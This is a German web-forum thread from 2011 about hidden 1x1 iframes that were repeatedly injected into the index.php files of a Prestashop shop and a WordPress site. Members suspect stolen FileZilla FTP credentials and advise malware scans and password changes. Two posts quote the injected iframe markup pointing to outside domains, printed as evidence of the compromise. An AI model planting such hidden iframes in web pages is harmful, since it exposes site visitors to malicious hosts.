iframe in meiner index.php

#0
30.01.2011, 10:52
...neu hier
Avatar wmkippe

Beiträge: 5
#1 Hallo Leute,
auch mit dem Risiko hier gleich angeranzt zu werden wegen doppel...
Ich bin was dieses Thema angeht absoluter Newbe und habe auch schon hier ewig gesucht

Also, ich habe seit einigen Tagen in meinem neuen Shop (Prestashop V1.3.2.3) in der index.php
sowie im ordner /include in der index.php ein Iframes zu stehen:

z.B.
<html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>

oder

<html><body><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe></body></html>

Den Ordner /config habe ich eigentlich mit .htaccess
Order deny,allow
Deny from all

gesichert?!

Habe diesen Mist schon einige male entfernt, aber ohne Erfolg, wie man sieht

Wie kann ich mich vor diesen Einträgen schützen bzw. wo muß ich ansetzen?
Bin über jeden hilfreichen Post dankbar...

wmkippe
__________
wmkippe- SEO-Marketing Fuzzi aus dem Brandenburger Land
Seitenanfang Seitenende
30.01.2011, 12:23
Member
Avatar Xeper

Beiträge: 5291
#2 Interessant, würde mir sorgen machen wenn die Leute einfach mal die Quelldateien auf deinem webspace ändern könnten.
Eventuell ist ja auch der Shop unsicher?
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode
Seitenanfang Seitenende
30.01.2011, 13:17
Member
Avatar Gool

Beiträge: 4730
#3 Oder es ist eine Malware, die die FTP-Account-Daten abgegriffen hat oder sich in eine bestehende FTP-Verbindung einklinkt.

PC unbedingt auf Viren überprüfen, FTP-Zugangsdaten ändern und Server-Logdateien auf ungewöhnliche Ereignisse überprüfen.
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser
Seitenanfang Seitenende
30.01.2011, 14:01
...neu hier

Themenstarter
Avatar wmkippe

Beiträge: 5
#4 hallo, vielen dank schon mal für die hinweise.

ich gehe mal auch eher davon aus, dass es unsichere srcipte oder so sind...
wie gesagt, mit den technischen kram kenne ich mich nicht wirklich aus, bin eher für seo u. marketinggeschichten zu gebrauchen.

die cmod rechte sind alle ok.

wie gool meint , die ftp-daten abgreifen , wäre möglich.
habe hier heute auch das pw geändert.
bestehende ftp verbindung kann nicht sein, weil einträge auch gemacht worden sind, als keine ftp verbindung meinerseitss bestand

also gool, ich komme aus dem raum berlin/brandenburg, da ist es mit nem termin nicht wirklich was. aber vielen dank für dein angebot...vielleicht können wir ja trotzdem mal per PN kommunizieren
__________
wmkippe- SEO-Marketing Fuzzi aus dem Brandenburger Land
Seitenanfang Seitenende
30.01.2011, 14:02
Member
Avatar Xeper

Beiträge: 5291
#5

Zitat

...
wie gesagt, mit den technischen kram kenne ich mich nicht wirklich aus, bin eher für seo u. marketinggeschichten zu gebrauchen.
Dann engagier jemanden der das kann.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode
Seitenanfang Seitenende
30.01.2011, 14:44
...neu hier

Themenstarter
Avatar wmkippe

Beiträge: 5
#6 ...xeper, hast du da nen tipp für mich ?
__________
wmkippe- SEO-Marketing Fuzzi aus dem Brandenburger Land
Seitenanfang Seitenende
30.01.2011, 19:55
Member
Avatar Gool

Beiträge: 4730
#7

Zitat

wmkippe postete
also gool, ich komme aus dem raum berlin/brandenburg, da ist es mit nem termin nicht wirklich was. aber vielen dank für dein angebot...vielleicht können wir ja trotzdem mal per PN kommunizieren
Das ist ja auch nur ne Signatur, die unter jedem Beitrag steht ;) Aber ich werde bald nach Berlin ziehen (wobei ich hoffe, dass das Problem für Dich dann schon längst gelöst ist).
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser
Seitenanfang Seitenende
05.02.2011, 12:03
...neu hier

Beiträge: 7
#8 Hi,

hab über Google hergefunden, da ich dasselbe Problem habe:

Zitat

<html><body><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>>
Bei mir ist es Wordpress. Bin im Moment am Schauen, ob es am Hoster liegt, an Filezilla oder eigener Dummheit...
Seitenanfang Seitenende
05.02.2011, 12:48
...neu hier

Themenstarter
Avatar wmkippe

Beiträge: 5
#9 Hi Loewenherz,

es liegt definitiv nicht am Hoster, soviel habe ich schon rausbekommen...

Es wird aller wahrscheinlich nach Dein Passwort von Filezilla ausgespäht und dann direkt über FTP in Deine Dateien geschrieben!

Habe bei meinem Hoster im selben Account noch einen Webkatalog, welcher schon seit Wochen auf Wartung geschalten war.Auch hier hatte ich Einträge in der index.php

Bevor ich mein Passwort von Filzilla gewechselt hatte, waren die gelöschten Iframe- Einträge nach 1-2 Tagen wieder drin.

Nun habe ich seit Montag Ruhe und hoffe dass es erst mal so bleibt.
Habe jetzt einige FTP Zugriffe auch direkt vom Hoster aus vorgenommen und Filzilla erst mal "geschont"

Also alles rauslöschen und Passwort ändern oder über Hoster ins FTP

Ich kenne mich bei Wordpress nicht aus, wo überall ne index.php drin steht.
Bei mir waren es etliche.
Dazu am besten mit Filzilla suchen
> dort oben auf "Server" gehen
> dann "Dateisuche auf Server"
>bei Dateiname enthält "index" eingeben und suchen

und den ganzen kram rauslöschen

... da dann ein schönes Wochenende ;)
__________
wmkippe- SEO-Marketing Fuzzi aus dem Brandenburger Land
Seitenanfang Seitenende
05.02.2011, 13:28
...neu hier

Beiträge: 7
#10 Hab das PW jetzt erneut geändert und in Filezilla gelöscht. Dort hab ich allerdings noch ca. 200 weitere FTP-Passwörter gespeichert. Wundere mich, dass diesen Webpaketen nichts passiert ist. Werd diese nun auch sukzessive ändern und rauslöschen. Was ne Arbeit...
Seitenanfang Seitenende
05.02.2011, 13:49
...neu hier

Themenstarter
Avatar wmkippe

Beiträge: 5
#11 Ja , wie die genau an das PW gekommen sind , weiß ich auch nicht...
vielleicht ist da bei Filezilla ne Lücke?
wenn Du da noch was rausbekommst, laß es mich wissen

als viel Spass noch !
__________
wmkippe- SEO-Marketing Fuzzi aus dem Brandenburger Land
Seitenanfang Seitenende
08.02.2011, 16:28
Member
Avatar Gool

Beiträge: 4730
#12 Entweder ihr habt eine manipulierte Version von FileZilla oder ihr habt eine Schadsoftware auf euren PCs, die u.a. die Passwörter bei FileZilla ausliest. Ich rate dringendst dazu, die PCs mal zu überprüfen.
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser
Seitenanfang Seitenende
08.02.2011, 16:36
...neu hier

Beiträge: 7
#13 Filezilla kam über die offizielle Ressource. Sofern die sauber ist, sollte es auch Filezilla sein.

Rechner wird derzeit überwacht von Microsoft Security Essentials (vorher Avira Premium), Threatfire, Spybot, Secunia PSI und Brain 2.0. Hast du einen Tipp, um die Kiste nochmal anders gegenzuchecken?
Seitenanfang Seitenende
08.02.2011, 17:19
Member
Avatar Gool

Beiträge: 4730
#14 Ja... http://board.protecus.de/t40182.htm

Zumindest kann man dann relativ sicher sein, ob man sich was eingefangen hat oder nicht. Man benötigt aber schon umfangreiche Windows-Kenntnisse, um die Ausgabe der Programme richtig deuten zu können. Du kannst die Log-Dateien ja hier mal veröffentlichen, damit wir mal drüber schauen können.
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser
Seitenanfang Seitenende
09.02.2011, 12:43
...neu hier

Beiträge: 7
#15 Danke Gool.

Ich hab das System mit Gmer gescannt. Log siehe hier: http://w23.it/gmerlog (aufgrund der Länge wollte ich jetzt nicht den Thread sprengen).
Viele Prozesse sind für mich klar erkennbar, manche sagen mir nichts, und Zeilen wie

Zitat

C:\WINDOWS\system32\lsass.exe[1308]
machen natürlich erstmal Sorgen, auch wenn lsass mir teilweise auch als tatsächlicher Windows-Dienst begegnet ist.
Dieser Beitrag wurde am 10.02.2011 um 10:47 Uhr von Loewenherz editiert.
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren: